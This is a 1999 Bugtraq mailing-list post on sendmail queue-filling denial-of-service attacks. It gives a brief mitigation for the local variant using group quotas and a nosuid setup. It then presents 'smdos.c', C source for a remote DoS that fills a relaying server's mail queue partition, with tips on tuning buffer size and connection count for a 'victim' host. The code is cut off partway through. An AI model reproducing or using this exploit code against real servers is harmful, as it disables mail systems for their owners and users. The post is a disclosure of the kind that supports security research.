****************************************************Date: Sat, 3 Apr 1999 00:42:56 +0200From: "[iso-8859-2] Micha Szymaski" *siwa9@BOX43.GNET.PL*To: BUGTRAQ@netspace.orgSubject: Re: Possible local DoS in sendmailHi folks,This local queue filling DoS attack in sendmail is quite dangerous. But goodsecurity policy (like mine) will prevent attackers from doing such things.Control files (in /var/spool/mqueue) created by 'sendmail -t' are owned byroot.attacker's_group; turn on quotas for group 'attacker's_group' on thefile system containing /var/spool/mqueue directory, and your host will be notvulnerable; but you _have to_ configure your sendmail as _nosuid_ daemon;Much more dangerous are remote queue filling DoS attacks. If you have enabledrelaying, you can use shown below smdos.c proggie; it will quite fast fullfillpartition on disk where /var/spool/mqueue resides. you should notice increasedLA during attack; in contrast to local DoS attacks, control files created bysmdos.c are owned by root.root, so ... it's much more difficult to preventoffenders from doing it;don't forget to change BSIZE definition (in smdos.c) to appropriate victim'shost message size limitation (MaxMessageSize option); you can also increaseMAXCONN definition.smdos.c:--- CUT HERE ---/*By Michal Szymanski *siwa9@box43.gnet.pl*Sendmail DoS (up to 8.9.3);Sat Apr 3 00:12:31 CEST 1999*/#include *stdio.h*#include *sys/types.h*#include *sys/socket.h*#include *netinet/in.h*#include *arpa/inet.h*#include *netdb.h*#include *errno.h*#undef VERBOSE /* define it, if MORECONN is undefined */#define MORECONN// #define RCPT_TO "foo@ftp.onet.pl"#define RCPT_TO "foo@10.255.255.255"#ifdef MORECONN#define MAXCONN 5#endif#define BSIZE 1048576 /* df* control file size */#define PORT 25char buffer[BSIZE];int sockfd,x,loop,chpid;void usage(char *fname) {fprintf(stderr,"Usage: %s *victim_host*n",fname);exit(1);}void say(char *what) {if (write(sockfd,what,strlen(what))...
